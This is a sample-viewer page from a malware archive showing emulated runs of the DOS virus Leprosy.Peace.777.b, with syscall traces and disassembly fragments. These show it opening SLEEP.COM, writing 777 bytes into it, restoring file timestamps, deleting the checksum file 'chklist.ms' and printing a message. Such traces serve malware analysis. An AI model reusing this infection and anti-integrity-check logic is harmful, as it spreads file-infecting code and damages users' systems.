Sample viewer

vx.netlux.org/Virus.DOS.Leprosy.Peace.777.b

.

GIF

Syscalls:

Time	Syscall Op	Syscall Name
2018-12-17T22:39:08.12844697Z	78	PC: 12b5d \| Find first file
2018-12-17T22:39:08.135256172Z	42	PC: 12b6f \| Get date 0x12b6f: cmp dh, 0xc 0x12b72: jne 0x12b7c 0x12b74: cmp dl, 5 0x12b77: jne 0x12b7c 0x12b79: jmp 0x12bf3 0x12b7c: mov ah, 0x4e 0x12b7e: mov dx, 0x11a 0x12b81: add dx, si 0x12b83: xor cx, cx 0x12b85: int 0x21 0x12b87: jb 0x12bc2 0x12b89: mov ax, 0x3d02 0x12b8c: mov dx, 0x9e 0x12b8f: int 0x21 0x12b91: cmp dx, 0x10e 0x12b95: je 0x12bb4 0x12b97: mov word ptr [si + 0x1fe], ax 0x12b9b: mov ax, 0x5700 0x12b9e: mov bx, word ptr [si + 0x1fe] 0x12ba2: int 0x21
2018-12-17T22:39:08.138413145Z	78	PC: 12b87 \| Find first file
2018-12-17T22:39:08.147651079Z	61	PC: 12b91 \| Open file (Filename = 'SLEEP.COM')
2018-12-17T22:39:08.163659472Z	87	PC: 12ba4 \| Get or set file date and time
2018-12-17T22:39:08.165638254Z	64	PC: 12bdc \| Write file or device (Write 777 bytes on handle 5)
2018-12-17T22:39:08.205126087Z	87	PC: 12be4 \| Get or set file date and time
2018-12-17T22:39:08.206909107Z	62	PC: 12bc1 \| Close file
2018-12-17T22:39:08.214689025Z	65	PC: 12bf0 \| Delete file (Filename = 'chklist.ms')
2018-12-17T22:39:08.23377508Z	44	PC: 12c0c \| Get time 0x12c0c: cmp dh, 0x1e 0x12c0f: jg 0x12c15 0x12c11: mov ah, 0x4c 0x12c13: int 0x21 0x12c15: mov ah, 9 0x12c17: mov dx, 0x1cc 0x12c1a: int 0x21 0x12c1c: mov ah, 0x4c 0x12c1e: int 0x21 0x12c20: mov ah, 0x4c 0x12c22: int 0x21 0x12c24: xor ax, 0xb4 0x12c27: mov cl, 4 0x12c29: shl ax, cl 0x12c2b: mov dl, byte ptr [0x355f] 0x12c2f: mov dh, 0 0x12c31: or ax, dx 0x12c33: mov cl, 8 0x12c35: shl ax, cl 0x12c37: mov word ptr [bp - 0xc], ax
2018-12-17T22:39:08.235897145Z	9	PC: 12c1c \| Display string (String= ' Let's have Peace in S.A. - from Ol' Jim Blue')
2018-12-17T22:39:08.245805487Z	76	PC: 12c20 \| Terminate with return code (Return code = '36')

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":true,"OriginalID":6726,"SideJobID":0}

.

GIF

Syscalls:

Time	Syscall Op	Syscall Name
2018-12-25T12:00:19.277597673Z	78	PC: 12b5d \| Find first file
2018-12-25T12:00:19.284176577Z	42	PC: 12b6f \| Get date 0x12b6f: cmp dh, 0xc 0x12b72: jne 0x12b7c 0x12b74: cmp dl, 5 0x12b77: jne 0x12b7c 0x12b79: jmp 0x12bf3 0x12b7c: mov ah, 0x4e 0x12b7e: mov dx, 0x11a 0x12b81: add dx, si 0x12b83: xor cx, cx 0x12b85: int 0x21 0x12b87: jb 0x12bc2 0x12b89: mov ax, 0x3d02 0x12b8c: mov dx, 0x9e 0x12b8f: int 0x21 0x12b91: cmp dx, 0x10e 0x12b95: je 0x12bb4 0x12b97: mov word ptr [si + 0x1fe], ax 0x12b9b: mov ax, 0x5700 0x12b9e: mov bx, word ptr [si + 0x1fe] 0x12ba2: int 0x21
2018-12-25T12:00:19.285830309Z	78	PC: 12b87 \| Find first file
2018-12-25T12:00:19.292547886Z	61	PC: 12b91 \| Open file (Filename = 'SLEEP.COM')
2018-12-25T12:00:19.300313366Z	87	PC: 12ba4 \| Get or set file date and time
2018-12-25T12:00:19.301756718Z	64	PC: 12bdc \| Write file or device (Write 777 bytes on handle 5)
2018-12-25T12:00:19.584917887Z	87	PC: 12be4 \| Get or set file date and time
2018-12-25T12:00:19.587555372Z	62	PC: 12bc1 \| Close file
2018-12-25T12:00:19.593311534Z	65	PC: 12bf0 \| Delete file (Filename = 'chklist.ms')
2018-12-25T12:00:19.59780932Z	44	PC: 12c0c \| Get time 0x12c0c: cmp dh, 0x1e 0x12c0f: jg 0x12c15 0x12c11: mov ah, 0x4c 0x12c13: int 0x21 0x12c15: mov ah, 9 0x12c17: mov dx, 0x1cc 0x12c1a: int 0x21 0x12c1c: mov ah, 0x4c 0x12c1e: int 0x21 0x12c20: mov ah, 0x4c 0x12c22: int 0x21 0x12c24: xor ax, 0xb4 0x12c27: mov cl, 4 0x12c29: shl ax, cl 0x12c2b: mov dl, byte ptr [0x355f] 0x12c2f: mov dh, 0 0x12c31: or ax, dx 0x12c33: mov cl, 8 0x12c35: shl ax, cl 0x12c37: mov word ptr [bp - 0xc], ax
2018-12-25T12:00:19.601065854Z	76	PC: 12c15 \| Terminate with return code (Return code = '0')

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":true,"OriginalID":6726,"SideJobID":0}

.

GIF

Syscalls:

Time	Syscall Op	Syscall Name
2018-12-25T12:00:19.230507819Z	78	PC: 12b5d \| Find first file
2018-12-25T12:00:19.239409287Z	42	PC: 12b6f \| Get date 0x12b6f: cmp dh, 0xc 0x12b72: jne 0x12b7c 0x12b74: cmp dl, 5 0x12b77: jne 0x12b7c 0x12b79: jmp 0x12bf3 0x12b7c: mov ah, 0x4e 0x12b7e: mov dx, 0x11a 0x12b81: add dx, si 0x12b83: xor cx, cx 0x12b85: int 0x21 0x12b87: jb 0x12bc2 0x12b89: mov ax, 0x3d02 0x12b8c: mov dx, 0x9e 0x12b8f: int 0x21 0x12b91: cmp dx, 0x10e 0x12b95: je 0x12bb4 0x12b97: mov word ptr [si + 0x1fe], ax 0x12b9b: mov ax, 0x5700 0x12b9e: mov bx, word ptr [si + 0x1fe] 0x12ba2: int 0x21
2018-12-25T12:00:19.241675426Z	78	PC: 12b87 \| Find first file
2018-12-25T12:00:19.247900815Z	61	PC: 12b91 \| Open file (Filename = 'SLEEP.COM')
2018-12-25T12:00:19.25525706Z	87	PC: 12ba4 \| Get or set file date and time
2018-12-25T12:00:19.257612142Z	64	PC: 12bdc \| Write file or device (Write 777 bytes on handle 5)
2018-12-25T12:00:19.271537075Z	87	PC: 12be4 \| Get or set file date and time
2018-12-25T12:00:19.274790658Z	62	PC: 12bc1 \| Close file
2018-12-25T12:00:19.2826968Z	65	PC: 12bf0 \| Delete file (Filename = 'chklist.ms')
2018-12-25T12:00:19.288785167Z	44	PC: 12c0c \| Get time 0x12c0c: cmp dh, 0x1e 0x12c0f: jg 0x12c15 0x12c11: mov ah, 0x4c 0x12c13: int 0x21 0x12c15: mov ah, 9 0x12c17: mov dx, 0x1cc 0x12c1a: int 0x21 0x12c1c: mov ah, 0x4c 0x12c1e: int 0x21 0x12c20: mov ah, 0x4c 0x12c22: int 0x21 0x12c24: xor ax, 0xb4 0x12c27: mov cl, 4 0x12c29: shl ax, cl 0x12c2b: mov dl, byte ptr [0x355f] 0x12c2f: mov dh, 0 0x12c31: or ax, dx 0x12c33: mov cl, 8 0x12c35: shl ax, cl 0x12c37: mov word ptr [bp - 0xc], ax
2018-12-25T12:00:19.291832902Z	76	PC: 12c15 \| Terminate with return code (Return code = '0')

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":31,"TimeBased":true,"OriginalID":6726,"SideJobID":0}

.

GIF

Syscalls:

Time	Syscall Op	Syscall Name
2018-12-25T12:00:19.579434619Z	78	PC: 12b5d \| Find first file
2018-12-25T12:00:19.600458345Z	42	PC: 12b6f \| Get date 0x12b6f: cmp dh, 0xc 0x12b72: jne 0x12b7c 0x12b74: cmp dl, 5 0x12b77: jne 0x12b7c 0x12b79: jmp 0x12bf3 0x12b7c: mov ah, 0x4e 0x12b7e: mov dx, 0x11a 0x12b81: add dx, si 0x12b83: xor cx, cx 0x12b85: int 0x21 0x12b87: jb 0x12bc2 0x12b89: mov ax, 0x3d02 0x12b8c: mov dx, 0x9e 0x12b8f: int 0x21 0x12b91: cmp dx, 0x10e 0x12b95: je 0x12bb4 0x12b97: mov word ptr [si + 0x1fe], ax 0x12b9b: mov ax, 0x5700 0x12b9e: mov bx, word ptr [si + 0x1fe] 0x12ba2: int 0x21
2018-12-25T12:00:19.60332621Z	78	PC: 12b87 \| Find first file
2018-12-25T12:00:19.610455824Z	61	PC: 12b91 \| Open file (Filename = 'SLEEP.COM')
2018-12-25T12:00:19.619433028Z	87	PC: 12ba4 \| Get or set file date and time
2018-12-25T12:00:19.621601332Z	64	PC: 12bdc \| Write file or device (Write 777 bytes on handle 5)
2018-12-25T12:00:19.637738009Z	87	PC: 12be4 \| Get or set file date and time
2018-12-25T12:00:19.640673866Z	62	PC: 12bc1 \| Close file
2018-12-25T12:00:19.649711149Z	65	PC: 12bf0 \| Delete file (Filename = 'chklist.ms')
2018-12-25T12:00:19.656552071Z	44	PC: 12c0c \| Get time 0x12c0c: cmp dh, 0x1e 0x12c0f: jg 0x12c15 0x12c11: mov ah, 0x4c 0x12c13: int 0x21 0x12c15: mov ah, 9 0x12c17: mov dx, 0x1cc 0x12c1a: int 0x21 0x12c1c: mov ah, 0x4c 0x12c1e: int 0x21 0x12c20: mov ah, 0x4c 0x12c22: int 0x21 0x12c24: xor ax, 0xb4 0x12c27: mov cl, 4 0x12c29: shl ax, cl 0x12c2b: mov dl, byte ptr [0x355f] 0x12c2f: mov dh, 0 0x12c31: or ax, dx 0x12c33: mov cl, 8 0x12c35: shl ax, cl 0x12c37: mov word ptr [bp - 0xc], ax
2018-12-25T12:00:19.659350473Z	9	PC: 12c1c \| Display string (String= ' Let's have Peace in S.A. - from Ol' Jim Blue')
2018-12-25T12:00:19.667117406Z	76	PC: 12c20 \| Terminate with return code (Return code = '36')

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":31,"TimeBased":true,"OriginalID":6726,"SideJobID":0}

.

GIF

Syscalls:

Time	Syscall Op	Syscall Name
2018-12-25T12:00:19.578286053Z	78	PC: 12b5d \| Find first file
2018-12-25T12:00:19.585897818Z	42	PC: 12b6f \| Get date 0x12b6f: cmp dh, 0xc 0x12b72: jne 0x12b7c 0x12b74: cmp dl, 5 0x12b77: jne 0x12b7c 0x12b79: jmp 0x12bf3 0x12b7c: mov ah, 0x4e 0x12b7e: mov dx, 0x11a 0x12b81: add dx, si 0x12b83: xor cx, cx 0x12b85: int 0x21 0x12b87: jb 0x12bc2 0x12b89: mov ax, 0x3d02 0x12b8c: mov dx, 0x9e 0x12b8f: int 0x21 0x12b91: cmp dx, 0x10e 0x12b95: je 0x12bb4 0x12b97: mov word ptr [si + 0x1fe], ax 0x12b9b: mov ax, 0x5700 0x12b9e: mov bx, word ptr [si + 0x1fe] 0x12ba2: int 0x21
2018-12-25T12:00:19.589717848Z	78	PC: 12b87 \| Find first file
2018-12-25T12:00:19.596537419Z	61	PC: 12b91 \| Open file (Filename = 'SLEEP.COM')
2018-12-25T12:00:19.604217674Z	87	PC: 12ba4 \| Get or set file date and time
2018-12-25T12:00:19.607781359Z	64	PC: 12bdc \| Write file or device (Write 777 bytes on handle 5)
2018-12-25T12:00:19.622918235Z	87	PC: 12be4 \| Get or set file date and time
2018-12-25T12:00:19.625258211Z	62	PC: 12bc1 \| Close file
2018-12-25T12:00:19.637929924Z	65	PC: 12bf0 \| Delete file (Filename = 'chklist.ms')
2018-12-25T12:00:19.645124976Z	44	PC: 12c0c \| Get time 0x12c0c: cmp dh, 0x1e 0x12c0f: jg 0x12c15 0x12c11: mov ah, 0x4c 0x12c13: int 0x21 0x12c15: mov ah, 9 0x12c17: mov dx, 0x1cc 0x12c1a: int 0x21 0x12c1c: mov ah, 0x4c 0x12c1e: int 0x21 0x12c20: mov ah, 0x4c 0x12c22: int 0x21 0x12c24: xor ax, 0xb4 0x12c27: mov cl, 4 0x12c29: shl ax, cl 0x12c2b: mov dl, byte ptr [0x355f] 0x12c2f: mov dh, 0 0x12c31: or ax, dx 0x12c33: mov cl, 8 0x12c35: shl ax, cl 0x12c37: mov word ptr [bp - 0xc], ax
2018-12-25T12:00:19.648213604Z	9	PC: 12c1c \| Display string (String= ' Let's have Peace in S.A. - from Ol' Jim Blue')
2018-12-25T12:00:19.661855176Z	76	PC: 12c20 \| Terminate with return code (Return code = '36')